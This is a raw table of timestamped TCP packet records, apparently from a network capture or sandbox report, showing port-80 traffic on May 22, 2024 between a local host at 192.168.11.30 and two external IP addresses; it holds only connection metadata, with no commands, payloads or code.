                                                                        May 22, 2024 17:33:27.820811987 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.820900917 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.821177006 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821227074 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821414948 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.821440935 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821556091 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821681023 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.821870089 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.821903944 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822012901 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.822149992 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822163105 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822287083 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.822483063 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822530985 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822707891 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.822856903 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.822905064 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823118925 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.823234081 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823260069 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823344946 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823378086 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.823481083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823565960 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.823721886 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823774099 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.823942900 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.824059010 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824158907 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824254990 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.824419975 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824464083 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824573994 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.824678898 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824804068 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.824904919 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.825057030 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825119972 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825256109 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.825385094 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825397015 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825623035 CEST4982080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:33:27.825728893 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:33:27.825741053 CEST804982037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:11.382162094 CEST4984780192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:11.591089010 CEST8049847203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:11.591285944 CEST4984780192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:11.593194008 CEST4984780192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:11.802501917 CEST8049847203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:11.819117069 CEST8049847203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:11.819197893 CEST8049847203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:11.819432020 CEST4984780192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:13.097738981 CEST4984780192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:14.115936041 CEST4984880192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:14.325309038 CEST8049848203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:14.325516939 CEST4984880192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:14.327382088 CEST4984880192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:14.536241055 CEST8049848203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:14.550146103 CEST8049848203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:14.550162077 CEST8049848203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:14.550275087 CEST4984880192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:15.831449032 CEST4984880192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:16.851747036 CEST4984980192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:17.061978102 CEST8049849203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:17.062220097 CEST4984980192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:17.064157963 CEST4984980192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:17.273271084 CEST8049849203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:17.286336899 CEST8049849203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:17.286350965 CEST8049849203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:17.286639929 CEST4984980192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:17.289424896 CEST4984980192.168.11.30203.161.49.193
                                                                        May 22, 2024 17:36:17.498435020 CEST8049849203.161.49.193192.168.11.30
                                                                        May 22, 2024 17:36:22.301378012 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:22.650053024 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:22.650249958 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:22.652529955 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.001398087 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.026519060 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.026546955 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.026825905 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.026840925 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.026868105 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.027075052 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.027090073 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.027115107 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.027339935 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.027561903 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.027586937 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.027756929 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.027781010 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.027848005 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.028052092 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.375714064 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.375853062 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.375961065 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.376022100 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.376116991 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.376147032 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.376252890 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.376312971 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.376573086 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.376683950 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.376804113 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.376959085 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.377063990 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.377211094 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.377319098 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.377418041 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.377537012 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.377578974 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.377649069 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.377722979 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.377887011 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.378036976 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.378103018 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.378290892 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.378513098 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.378649950 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.378719091 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.378781080 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.378930092 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.378993034 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.724987984 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.725035906 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.725321054 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.725366116 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.725399971 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.725497961 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.725647926 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.725671053 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.725888968 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.726313114 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.726341009 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.726387978 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.726511002 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.726543903 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.726658106 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.726671934 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.726895094 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.727025986 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727070093 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727233887 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.727376938 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727395058 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727657080 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.727718115 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.727821112 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728055000 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.728130102 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728185892 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728338957 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.728511095 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728554964 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728754997 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728795052 CEST804985037.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:23.728796959 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:23.729008913 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:24.157619953 CEST4985080192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.175451994 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.523999929 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.524285078 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.526063919 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.874783993 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902326107 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902354002 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902487993 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.902601004 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902751923 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.902929068 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.903001070 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903017044 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903228045 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.903295040 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903402090 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903580904 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:25.903666019 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903703928 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:25.903943062 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.251102924 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251118898 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251283884 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.251873016 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251970053 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.251983881 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252065897 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252152920 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.252367020 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252382040 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252388000 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.252557993 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.252721071 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252825975 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.252973080 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253051996 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253078938 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253402948 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253468990 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253506899 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253696918 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253712893 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253778934 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253839970 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.253926992 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.253942013 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.254146099 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.254290104 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.254342079 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.254600048 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.599864006 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.599982977 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600104094 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600172997 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.600208998 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600410938 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.600598097 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600711107 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600882053 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.600931883 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601018906 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601239920 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601413965 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601428986 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601609945 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601665020 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601680040 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601907015 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.601917028 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.601931095 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602068901 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.602124929 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602173090 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602375984 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.602492094 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602504015 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602667093 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.602866888 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.602967978 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603179932 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:26.603180885 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603194952 CEST804985137.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:26.603456020 CEST4985180192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.706368923 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706489086 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706653118 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.706768990 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706835032 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.706975937 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.707298040 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.707350969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.707521915 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.707824945 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.707946062 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.708179951 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.708487034 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.708539009 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.708692074 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.709032059 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.709161997 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.709355116 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.709762096 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.709878922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.710122108 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.710346937 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.710400105 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.710598946 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.710918903 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.711064100 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.711313963 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.711632967 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.711684942 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712160110 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712176085 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.712214947 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712451935 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.712743998 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.712795973 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.713046074 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.713402987 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.713510036 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.713722944 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.714029074 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.714082003 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.714217901 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.714823008 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.714927912 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.715111971 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.715286970 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.715413094 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.715621948 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.716074944 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716190100 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716365099 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.716552019 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716670990 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.716819048 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.717264891 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.717318058 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.717582941 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.717905045 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718024015 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718260050 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.718565941 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718682051 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.718921900 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:32.719368935 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.719423056 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:32.719660997 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.044534922 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.044552088 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.044735909 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.045144081 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045159101 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045383930 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.045548916 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045664072 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.045888901 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.046132088 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046148062 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046291113 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.046725035 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046840906 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.046972036 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.047341108 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.047354937 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.047557116 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.047946930 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.047962904 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.048167944 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.048412085 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049000978 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049122095 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049225092 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.049309969 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049417973 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049499035 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.049707890 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049724102 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049962997 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.049967051 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.049979925 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050189972 CEST4985380192.168.11.3037.140.192.90
                                                                        May 22, 2024 17:36:33.050420046 CEST804985337.140.192.90192.168.11.30
                                                                        May 22, 2024 17:36:33.050472021 CEST804985337.140.192.90192.168.11.30
